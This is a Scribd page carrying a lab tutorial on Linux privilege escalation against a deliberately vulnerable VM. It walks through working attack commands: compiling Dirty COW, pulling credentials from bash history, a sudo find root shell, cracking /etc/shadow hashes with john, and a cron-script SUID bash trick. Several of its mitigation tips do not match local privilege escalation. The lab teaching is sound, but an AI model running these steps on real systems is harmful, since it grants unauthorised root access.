0% found this document useful (0 votes)
100 views14 pages

A Hands-On Approach To Linux Privilege Escalation: Tanishq Sharma, Shikhar Saxena

The document provides techniques for Linux privilege escalation attacks, including exploiting kernel vulnerabilities, password mining, sudo misconfigurations, file permission issues, and crontab jobs. It describes how attackers first gain initial access, then enumerate the system to find escalation opportunities. Examples are given where the attacker exploits the Dirty COW kernel bug, finds credentials in bash history, uses sudo to spawn a root shell, cracks the root password hash from /etc/shadow, and schedules a privileged bash script to run via crontab. Mitigation strategies include keeping critical data on the server-side and encoding/encrypting transmitted data.

Uploaded by

Jouris Hofni
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
100 views14 pages

A Hands-On Approach To Linux Privilege Escalation: Tanishq Sharma, Shikhar Saxena

The document provides techniques for Linux privilege escalation attacks, including exploiting kernel vulnerabilities, password mining, sudo misconfigurations, file permission issues, and crontab jobs. It describes how attackers first gain initial access, then enumerate the system to find escalation opportunities. Examples are given where the attacker exploits the Dirty COW kernel bug, finds credentials in bash history, uses sudo to spawn a root shell, cracks the root password hash from /etc/shadow, and schedules a privileged bash script to run via crontab. Mitigation strategies include keeping critical data on the server-side and encoding/encrypting transmitted data.

Uploaded by

Jouris Hofni
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 14

A hands-on

approach to
Linux
Privilege
Escalation
Tanishq Sharma, Shikhar Saxena
INTRODUCTION

This document is intended to provide multiple techniques that pentester can use
to escalate their privileges and gain access to higher roles(example: administrator
or root).

Example: For a web application it can be


accessing other users’ profile on a social
Privilege escalation is a technique of exploiting a media platform, e-commerce site etc
vulnerability, or configuration on a web
application or operating system to gain elevated With Vertical privilege escalation, attackers
access to permissions that should not be gain elevated privileges typically of an
available to that user. After gaining escalated administrator on windows or a root user on
privileges the attacker can steal confidential data, a Unix/Linux system. As compared to
deploy malware, and potentially do serious horizontal privilege escalation it is more
damage to an operating system. dangerous as attackers get its privileges
elevated from a lower privileged shell/user
to higher privileged shell/user. With these
elevated privileges the attacker can steal all
the sensitive information, can run
Attacker’s start by enumerating the target potentially dangerous commands, can
machine to find information about the services deploy malware on the system and can
that are running on the target machine. After damage the operating system seriously.
enumerating the target system the attacker plans Since the attacker has the higher privileged
for the next steps and lists all the information account then the attacker can cover all the
gathered so far. Next the Attacker makes sure that tracks by deleting access logs and other
the vulnerability exists and exploits the privilege evidence of their activity. This way
escalation vulnerability on the target machine cybercriminals can steal sensitive
which lets them override the limitations of the information or deploy malware directly in
current user account. Now the attacker can company systems.
access the functionality and data of another user
(Horizontal privilege Escalation ) or obtain higher
level privileges, usually of an administrator or a
root(Vertical privilege escalation)

With Horizontal privilege escalation, the attacker


remains on the same general user privilege but
can access functionality or data of other accounts
(having the same privilege).

Lucideus 2020 2
Linux Privilege Escalation
Linux Privilege Escalation can be of many types but the types which this document will cover is :

● Privilege Escalation by kernel exploit

● Privilege Escalation by Password Mining

● Privilege Escalation by Sudo

● Privilege Escalation by File Permissions

● Privilege Escalation by Crontab

1. First go to https://github.com/sagishahar/lpeworkshop and download the target


machine from here and import it in your VMware/VirtualBox software to set up the
vulnerable environment.

2. In the git repo there are credentials provided for the machine:

Username: user and Password: password321

Username: root and Password: password123

3. Now login into the machine and check the ip address using ifconfig command in our
case it is 192.168.110.129.

4. Now the vulnerable machine is up and can be exploited.

Lucideus 2020 3
Linux Privilege Escalation

1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).

2. After getting the ssh of the victim machine try to do some system enumeration to get
some information about the target system by using commands like “uname -a” and “cat
/proc/version”.

3. So after getting some information about the system try to find an exploit for the
corresponding linux system. In this case the linux version was vulnerable to Dirty Cow
exploit.
A. Exploit can be founded at: https://www.exploitdb.com/exploits/40839
B. Now copy the code of the exploit.
4. Now create a file by using the command “nano dirty.c” and paste the exploit code in the
file.
5. After this compile the exploit by using the command:
● gcc -pthread dirty.c -o dirty -lcrypt
6. After compiling the exploit, run the compiled file in this case “./dirty”.

Lucideus 2020 4
Linux Privilege Escalation

7. After executing the exploit will ask to enter a password so enter any password that you
can remember.

8. Now , to get the root privilege enter the below command:

● su firefart (it will prompt for password enter the password you entered at the time
when the exploit was executing).

Now we know that the exploit actually worked as we got the root privilege.

Lucideus 2020 5
Linux Privilege Escalation

1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).

2. Now look into the commands that had been used in the target machine previously by
using command “history” or “cat .bash_history”.

3. From the output , we can see the credentials for MySQL but let's try to use these
credentials to get root privilege.

From the above screenshot we can see that the credentials that we found from the
history command also worked for root user.

Lucideus 2020 6
Linux Privilege Escalation

1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).

2. In command prompt type: sudo -l

From the output , notice the list of programmes that can be executed via sudo.

3. Notice that the find command can be run via sudo, so we can use find command to
elevate our privilege by using the command “sudo find . -exec /bin/sh \; -quit”

Since find command was allowed to run via sudo we used it to escalate our privilege.

Lucideus 2020 7
Linux Privilege Escalation

1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password:password321).

2. In command prompt type: ls -al /etc/shadow

So we can see that /etc/shadow file is having read permission, so the regular user is
allowed to read this file.

3. In command prompt type: cat /etc/shadow

Copy the hash for the root user.

Lucideus 2020 8
Linux Privilege Escalation

4. Now in your Attacker machine open the command prompt and type: echo “root_hash” >
hash.txt

5. After putting the hash in a file try to crack it by using the command: john
--wordlist=<path/to/wordlist> hash.txt

6. From the output , notice the cracked credentials in this case it is “password123” and use it
to escalate your privilege.

From the above screenshot we can see that the credentials that we found from
cracking the hash worked for the root.

Lucideus 2020 9
Linux Privilege Escalation

1. Start with taking the ssh instance of the victim machine by using the command ssh
[email protected] (Use the username: user and password: password321).

2. In the command prompt type: cat /etc/crontab

3. In the command prompt type: echo 'cp /bin/bash /tmp/bash; chmod +s


/tmp/bash'>/home/user/overwrite.sh

Lucideus 2020 10
Linux Privilege Escalation

4. Give executable permission to overwrite.sh by using the command: chmod +x


/home/user/overwrite.sh

5. Wait 1 minute for the bash script to execute after that in your command prompt type:
/tmp/bash -p

So we successfully elevated our privileges by using crontab.

Lucideus 2020 11
Mitigation:

1. The most basic step in preventing a privilege


escalation attack is to keep all the important
information on the server side and send only
Session ID’s to the client side. When all the
critical information is stored on the server
side it becomes difficult for an attacker to
fetch the details and abuse them. For this
kind of setup the session state of HTTP
should be set to persistent.

2. Encoding and Encryption is an essential step


in protecting any information from an
attacker. This technique adds another step
as the data needs to be encrypted and
decrypted again and again.

3. Ensure that strong password policies are


setup so that there are less chances of brute
forcing the password and escalating the
privileges.

4. All the unused ports should be closed by


default and all the files should have read
only access enabled to them and giving
write permissions to only users and groups
who need them.

5. Sanitizing all the user inputs treating them


as malicious. A whitelist of characters should
be created and only those characters
should be allowed.

6. Last but not the least, all the applications


and systems should be patched and
updated to the latest security version WAF

7. (Web Application Firewall) can also help in


certain scenarios.

Lucideus 2020 12
References:

1. https://www.exploit-db.com/exploits/40839
2. https://gtfobins.github.io/#+sudo
3. https://www.exploit-db.com/docs/46131
4. https://www.netsparker.com/blog/web-security/privilege-escalation/
5. https://github.com/sagishahar/lpeworkshop
6. https://drive.google.com/file/d/0B6EDpYQYL72rQ2VuWS1QR2ZsUlU/view
7. https://www.exploit-db.com/exploits/40839

Lucideus 2020 13
Lucideus 2020 14

You might also like